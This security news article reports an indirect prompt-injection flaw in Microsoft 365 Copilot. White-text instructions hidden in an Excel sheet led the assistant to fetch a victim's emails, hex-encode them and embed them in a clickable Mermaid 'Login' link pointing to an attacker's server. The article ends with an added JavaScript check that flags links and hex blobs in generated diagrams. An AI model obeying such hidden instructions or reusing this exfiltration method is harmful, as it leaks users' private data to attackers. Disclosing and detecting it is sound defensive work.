A vulnerability in Microsoft 365 Copilot allowed attackers to trick the AI assistant into fetching and exfiltrating sensitive tenant data by hiding instructions in a document.
The AI then encoded the data into a malicious Mermaid diagram that, when clicked, sent the stolen data to an attacker’s server.
When Microsoft 365 Copilot was asked to summarize a specially crafted Office document, an indirect prompt injection payload caused it to run hidden steps, as reported by researchers.
Instead of producing a normal summary, it fetched recent corporate emails, hex-encoded them, and built a fake “Login” button as a Mermaid diagram.

That diagram contained CSS and a hyperlink pointing to an attacker’s server, with the encoded data embedded in the URL.
When an unsuspecting user clicked the button, the sensitive data was transmitted to the attacker’s logs, where it could be decoded later.
How the Attack Worked
Mermaid is a tool that generates diagrams from simple text definitions. It supports flowcharts, sequence diagrams, Gantt charts, and more using Markdown-style syntax.
When Copilot generates a Mermaid diagram, it also allows CSS styling, which opens up a vector for embedding malicious hyperlinks.
In this case, the attacker used Copilot’s built-in search tool to retrieve the victim’s recent emails. The AI then transformed the list into a single hex-encoded string, breaking it into lines of 30 characters so the Mermaid renderer wouldn’t error out.
Finally, the AI inserted the hex data into a clickable “Login” node. The node’s CSS style defined the hyperlink that pointed to a private Burp Collaborator server. The code looked roughly like this:
graph LR
A[Malicious Document] -->|Person asks to summarize| B[Indirect Prompt Injection]
B --> C[Fetch & Encode Emails]
C --> D[Generate Fake Login Button]
D -->|Person clicks| E[Exfiltrate Data]
Clicking the button caused a hidden iframe to appear, briefly displaying an HTTP response from the attacker’s server before disappearing, making the trick more believable.
The attacker even replaced the response contents with a mock Microsoft 365 login screen image to convince users they needed to log in to see the summary.
Indirect prompt injection occurs when attackers embed instructions inside external content such as documents or emails.
When an AI processes that content, the hidden commands take effect, letting attackers override the intended behavior.
Unlike direct injection, where the attacker interacts with the model, indirect injection exploits benign-looking data sources the AI trusts.
To hide instructions, the attacker used white text in an Excel sheet. The first page contained nested instructions telling Copilot to ignore the financial data and focus on a login prompt.
A second hidden page instructed Copilot to fetch emails, encode them, and render the malicious diagram.
After responsible disclosure, Microsoft patched Copilot to disable interactive elements like hyperlinks in Mermaid diagrams.
This change prevents AI-generated diagrams from including clickable links, closing the exfiltration channel. Users are advised to update their Copilot integrations and avoid summarizing untrusted documents until the patch is applied.
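A pre-render check in the spirit of that fix, as an added example that is not code from the researchers' report or from Microsoft's patch: it inspects model-generated Mermaid text for the traits described above (links, interactive directives, long hex runs) before anything is drawn. The rule names, the 24-character hex threshold, the function names and the sample diagrams are assumptions made for illustration; `click` is Mermaid's own interaction directive.

```javascript
// Added example: pre-render check for LLM-generated Mermaid text.
// Rule ids and thresholds are assumptions, not Microsoft's actual fix.
const RULES = [
  // Any absolute URL: links, CSS url(...), image sources.
  { id: "external-url", re: /\bhttps?:\/\/[^\s"')\]]+/gi },
  // Mermaid interaction directive binding a link or callback to a node.
  { id: "click-directive", re: /^\s*click\s+\S+/gim },
  // Raw HTML elements that can load or link to remote content.
  { id: "html-link", re: /<\s*(a|iframe|img)\b/gi },
  // Long hex runs, such as the 30-character chunks described above.
  { id: "hex-blob", re: /\b[0-9a-f]{24,}\b/gi },
];

// Returns one finding per rule that matched, with the number of hits.
function inspectMermaid(source) {
  const findings = [];
  for (const { id, re } of RULES) {
    const hits = source.match(re) || [];
    if (hits.length > 0) findings.push({ id, count: hits.length });
  }
  return findings;
}

// Render only when nothing was flagged; otherwise show the text inert.
function shouldRender(source) {
  return inspectMermaid(source).length === 0;
}

// Constructed samples (not taken from the report).
const benign = [
  "graph LR",
  "A[Q1 revenue] --> B[Q2 revenue]",
  "B --> C[Forecast]",
].join("\n");

const suspicious = [
  "graph LR",
  'A["Login"]',
  'click A href "https://collector.example/?d=0123456789abcdef0123456789abcd"',
  "B[0123456789abcdef0123456789abcd]",
].join("\n");

console.log(inspectMermaid(benign));
console.log(inspectMermaid(suspicious));
```

A check like this complements, and does not replace, rendering diagrams with links and scripts disabled, since pattern matching on model output can be evaded by re-encoding.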